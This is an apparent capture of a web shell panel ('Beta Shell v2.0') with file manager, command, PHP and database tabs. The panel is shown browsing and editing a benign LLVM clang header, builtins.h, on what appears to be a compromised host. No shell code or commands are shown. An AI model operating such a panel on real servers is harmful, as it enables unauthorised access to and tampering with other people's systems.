Beta Shell
v2.0 ยท web2.us.cloudlogin.co
[FM]
[CMD]
[PHP]
[DB]
[INFO]
[SEC]
File Manager
~
/
usr
/
lib
/
clang
/
19
/
include
/
zos_wrappers
Upload
3 items
Name
Size
Perms
Modified
Actions
[ .. / .. ]
builtins.h
608 B
-rw-r--r--
2025-01-14 09:41:02
Edit
Del
Editing: builtins.h
(608 B)
Path: /usr/lib/clang/19/include/zos_wrappers/builtins.h
Back
/*===---- builtins.h - z/Architecture Builtin Functions --------------------=== * * Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. * See https://llvm.org/LICENSE.txt for license information. * SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception * *===-----------------------------------------------------------------------=== */ #ifndef __ZOS_WRAPPERS_BUILTINS_H #define __ZOS_WRAPPERS_BUILTINS_H #if defined(__MVS__) #include_next <builtins.h> #if defined(__VEC__) #include <vecintrin.h> #endif #endif /* defined(__MVS__) */ #endif /* __ZOS_WRAPPERS_BUILTINS_H */